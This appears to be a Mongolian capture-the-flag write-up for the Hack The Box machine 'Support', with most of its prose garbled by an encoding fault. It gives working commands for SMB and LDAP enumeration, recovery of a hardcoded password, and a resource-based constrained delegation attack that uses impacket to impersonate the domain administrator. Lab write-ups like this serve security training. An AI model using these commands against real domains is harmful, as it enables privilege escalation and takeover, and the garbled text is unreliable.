๐คSupport
Kerberos Exploit, LDAP enumeration, Windows Fuzzing
ะะธ ะตัำฉะฝั ะธะนะดำฉำฉ ั ััะดะฐะฝ ะผัะดััะปัะป ะพะปะถ ะฐะฒะฐั ะทะพัะธะปะณะพะพั rustscan ะฐัะธะณะปะฐะถ ัะบะฐะฝะดะฐั ะดัััะฐะน
rustscan -a support.htb --ulimit 5000 -b 2000
Open 10.10.11.174:53
Open 10.10.11.174:88
Open 10.10.11.174:135
Open 10.10.11.174:139
Open 10.10.11.174:389
Open 10.10.11.174:445
Open 10.10.11.174:464
Open 10.10.11.174:593
Open 10.10.11.174:636
Open 10.10.11.174:3269
Open 10.10.11.174:3268
Open 10.10.11.174:5985
Open 10.10.11.174:9389
Open 10.10.11.174:49664
Open 10.10.11.174:49668
Open 10.10.11.174:49670
Open 10.10.11.174:49675
Open 10.10.11.174:49699
Open 10.10.11.174:52273445 ะฑััั SMB ะพะฝะณะพัั ะพะน ะฑะฐะนัะฐะฝ ัััะฐะฐั smbclient-ะณ ะฐัะธะณะปะฐะถ share ะดะพัะพั ะฑะฐะนะณะฐะฐ ั ัััะณะปัะณัะดะธะนะฝ ะผัะดััะปะปะธะนะณ ะพะปะถ ะฐะฒัะฐะฝ
smbclient -L support.htb -N

Enumeration ั ะธะนั ัะด ะพะปะดัะพะฝ support-tools ั ะฐะฒัะฐััะณ ะฝัะผัะปัััั ะพัััะปะถ ะดะฐั ะธะฝ ั ะฐะฝะดะฐะปั ั ะธะนะถ าฏะทะฝั
smbclient //support.htb/support-tools -N

ะัำฉะฝั ะธะนะดำฉำฉ ะฑาฏั ัะฐะนะปัะณ ะฝั mget * ะณัั ะผััััั ัะฐัะฐะถ าฏะทััะฝ ะฑำฉะณำฉำฉะด UserInfo.exe.zip ะดะพัะพั ะฝััั ะผัะดััะปะปาฏาฏะด ะฑะฐะนัะฐะฝ

Zip ัะฐะนะปัะณ ะทะฐะดะปะฐะฐะด าฏะทะฒัะป ะดะพัะพั ะฝั UserInfo.exe ะฑััั Executable ัััะด ะฐะถะธะปะปััะปะฐั ะฑะพะปะพะผะถัะพะน ัะฐะนะป ะฑะฐะนะฒ

ะญะฝัั าฏาฏ .exe ัะฐะนะปะฐะฐ ะทะฐะดะปะฐะฐะด าฏะทะฒัะป ะดะพัะพั ะฝั Protected , LDAPQuery ั ัััะณั getPassword, enc_password, key ะณัััะฝ ััะถะธะณััะน 3 ั ัััะณ ั ะฐัะฐะณะดะฐะฒ

enc_password ั ััะณะธะนะณ ั ะฐัะฒะฐะป ะดะพัะพั ะฝั ัะผะฐั ัะธััะปัะปั ะฝั ะผัะดัะณะดัั ะณาฏะน ัะพะฝะธะฝ ััะผะดัะณัาฏาฏะด ะฐะณััะปัะฐะฝ ะฝััั าฏะณ ะฑะฐะนะฒ
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

key ั ััะณะธะนะณ ั ะฐัะฒะฐะป ัะธััะปัะปัะธะนะฝ ัาฏะปั าฏาฏั ะฑะฐะนั ะฑำฉะณำฉำฉะด armando ะณัะดัะณ string ัำฉัำฉะปััะน ะฑะฐะนะฒ

ะขาฏะปั
าฏาฏั ะฝั "armando"ะะฝะปะฐะนะฝะฐะฐั ัะฐะนะปะฐั ะณัะถ ะฝะธะปััะฝ าฏะทััะฝ ะฑะพะปะพะฒั ะฐะผะถะธะปััะณ ัั ะพะปัะพะฝ ัััะฐะฐั ัั ะปััะด base64-ะพะพั ัะฐะนะปะฐะฐะด ะฝัะณ ะฑาฏััะปัะฝ ะผะฐััะธะฒั ั ัะฒะฐะฐะถ ะฑะฐะนะณะฐะฐะด join ั ะธะนะถ าฏะทัะฒ

ะฏะผะฐั ั ะฑะฐะนัะฐะฝ human-readable ัะตะบัั ะณะฐัั ะธัััะฝ ะฑำฉะณำฉำฉะด ัะฝัั าฏาฏ าฏั ะดาฏะฝะณ ะฐัะธะณะปะฐะฐะด LDAP enumeration ั ะธะนั ะฑะพะปะพะผะถัะพะน

Domain ะดะพััะพะพัะพะพ LDAPsearch ั
ะธะนะณััะด username-ะด ั
ะฐัะณะฐะปะทะฐั
ะฝััั าฏะณะธะนะณ ะพะปะพั
ะฑะพะปะพะผะถัะพะน Ironside47pleasure40Watchful

Ironside47pleasure40WatchfulLDAP-ะฐะฐั ั ัััะณะปัะณัะดะธะนะฝ ะฝััะธะนะณ ัาฏาฏะถ ะฐะฒะฐะฐะด user.txt ัะฐะนะป ะฑะพะปะณะพะพะด ะฑะธะดะฝะธะน ะพะปัะพะฝ ะฝััั าฏะณััะน ะทำฉะฒ ั ะฐัะณะฐะปะทะฐั ะฝััะธะนะณ ะพะปะฝะพ




New-MachineAccount -MachineAccount fg0x0 -Password $(ConvertTo-SecureString 'fg0x0' -AsPlainText -Force) -VerboseGet-DomainComputer fg0x0$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5601)"$SDBytes = New-Object byte[] ($SD.BinaryLength)$SD.GetBinaryForm($SDBytes, 0)Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'impacket ะฐัะธะณะปะฐะฐะด kerberos ticket าฏาฏัะณัั ะฑะพะปะพะผะถัะพะน ั ะฐัะธะฝ าฏาฏัะณัั ะดัั domain-ะณ /etc/hosts ะดะพััะพะพ ะฝัะผะถ ำฉะณำฉั ำฉำฉ ะผะฐััะฒะฐะฐ
impacket-getST support.htb/fg0x0:fg0x0 -dc-ip support.htb -impersonate administrator -spn www/dc.support.htb
export KRB5CCNAME=administrator.ccache
impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k


Last updated
